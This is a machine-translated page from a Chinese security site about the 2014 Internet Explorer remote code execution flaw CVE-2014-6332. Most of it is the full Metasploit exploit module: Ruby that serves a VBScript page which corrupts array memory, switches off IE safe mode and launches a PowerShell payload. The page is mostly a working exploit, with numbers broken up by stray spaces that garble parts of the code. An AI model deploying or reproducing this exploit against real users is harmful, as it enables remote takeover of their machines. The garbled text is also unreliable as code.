IE remote code execution vulnerability, CVE-2 0 1 4-6 3 3 2 Using the test method-vulnerability warning-the black bar safety net

2014-11-18T00:00:00
ID MYHACK58:62201455961
Type myhack58
Reporter 佚名
Modified 2014-11-18T00:00:00

Description

Win95+IE3 – Win10+IE11 full version execution vulnerability

!

Microsoft this month's security update fixes a potential of the 1 8 years of IE remote code execution vulnerability, CVE-2 0 1 4-6 3 3 2, You can say Yes to the windows to eat a big Supplement pills. Defects appear in the VBScript code, from Windows 9 5 first published in 1 9 years ago since it has always existed. Details point I

Metasploit Framework under the use of the test

All IE version pass to kill, but because of the msf comes with exp in the call is powershell, so msf(Metasploit Framework in the exp code just to install powershell the system to take effect. Here we test the victim machine is a Windows 2008.

This site offers security tools, procedures(methods)may carry offensive, for security research and teaching purposes at your own risk!

msf code:

This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core' require 'msf/core/exploit/powershell'class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Powershell

def initialize(info={}) super(update_info(info, 'Name' => "Windows OLE Automation Array Remote Code Execution", 'Description' => %q{ This modules exploits the Windows OLE Automation Array Remote Code Execution Vulnerability. Internet MS-1 4-0 6 4, CVE-2 0 1 4-6 3 3 2. The vulnerability exists in Internet Explorer 3.0 until version 1 1 within Windows95 up to Windows 1 0. }, 'License' => MSF_LICENSE, 'Author' => [ 'IBM', # Discovery 'yuange <twitter.com/yuange75>', # PoC 'Rik van Duijn <twitter.com/rikvduijn>', #Metasploit 'Wesley Neelen <security[at]forsec.nl>' #Metasploit ], 'References' => [ [ 'CVE', '2014-6332' ] ], 'Payload' => { 'BadChars' => "\x00", }, 'DefaultOptions' => { 'EXITFUNC' => "none" }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => "November 1 2 2 0 1 4", 'DefaultTarget' => 0)) end

def on_request_uri(cli, request) payl = cmd_psh_payload(the payload. encoded,"x86",{ :remove_comspec => true }) payl. slice! "powershell.exe "

html = <<-EOS <! doctype html><html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><head></head><body><SCRIPT LANGUAGE="VBScript">

function trigger()

On Error Resume Next

set shell=createobject("Shell. Application")

shell. ShellExecute "powershell.exe", "#{payl}", "", "open", 1end function

</script><SCRIPT LANGUAGE="VBScript">

dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray

Begin()

function Begin()

On Error Resume Next

info=Navigator. UserAgent

if(instr(info,"Win64")>0) then exit function end if

if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else

exit function

end if

win9x=0

BeginInit()

If Create()=True Then

myarray= chrw(0 1)&chrw(2 1 7 6)&chrw(0 1)&chrw(0 0)&chrw(0 0)&chrw(0 0)&chrw(0 0)&chrw(0 0)

myarray=myarray&chrw(0 0)&chrw(3 2 7 6 7)&chrw(0 0)&chrw(0)

if(intVersion<4) then

document. write("<br> IE")

document. write(intVersion)

runshellcode()

else

setnotsafemode()

end if

end ifend function

function BeginInit()

Randomize()

redim aa(5)

redim ab(5)

a0=1 3+1 7*rnd(6)

a3=7+3*rnd(5)end function

function Create()

On Error Resume Next

dim i

Create=False

For i = 0 To 4 0 0

If Over()=True Then

'document. write(i)

Create=True

Exit For

End If

Next

end function

sub testaa()

end sub

function mydata()

On Error Resume Next

i=testaa

i=null

redim Preserve aa(a2)

ab(0)=0

aa(a1)=i

ab(0)=6.36598737437801 E-3 1 4

aa(a1+2)=myarray

ab(2)=1.74088534731324 E-3 1 0

mydata=aa(a1)

redim Preserve aa(a0)

end function

function setnotsafemode()

On Error Resume Next

i=mydata()

i=readmemo(i+8)

i=readmemo(i+1, 6)

j=readmemo(i+&h134)

for k=0 to &h60 step 4

j=readmemo(i+&h120+k)

if(j=1 4) then

j=0

redim Preserve aa(a2)

aa(a1+2)(i+&h11c+k)=ab(4)

redim Preserve aa(a0)

j=0

j=readmemo(i+&h120+k)

Exit for

end if

next

ab(2)=1.69759663316747 E-3 1 3

trigger()

end function

function Over()

On Error Resume Next

dim type1,type2,type3

Over=False

a0=a0+a3

a1=a0+2

a2=a0+&h8000000

redim Preserve aa(a0)

redim ab(a0)

redim Preserve aa(a2)

type1=1

ab(0)=1.123456789012345678901234567890

aa(a0)=1 0

If(IsObject(aa(a1-1)) = False) Then

if(intVersion<4) then

mem=cint(a0+1)*1 6

j=vartype(aa(a1-1))

if((j=mem+4) or (j*8=mem+8)) then

if(vartype(aa(a1-1))<>0) Then

If(IsObject(aa(a1)) = False ) Then

type1=VarType(aa(a1))

end if

end if

else

redim Preserve aa(a0)

exit function

end if

else

if(vartype(aa(a1-1))<>0) Then

If(IsObject(aa(a1)) = False ) Then

type1=VarType(aa(a1))

end if

end if

end if

end if

If(type1=&h2f66) Then

Over=True

End If

If(type1=&hB9AD) Then

Over=True

win9x=1

End If

redim Preserve aa(a0)

end function

function ReadMemo(add)

On Error Resume Next

redim Preserve aa(a2)

ab(0)=0

aa(a1)=add+4

ab(0)=1.69759663316747 E-3 1 3

ReadMemo=lenb(aa(a1))

ab(0)=0

redim Preserve aa(a0)

end function

</script>

</body>

</html> EOS

print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'})

end

end

[1] [2] [3] next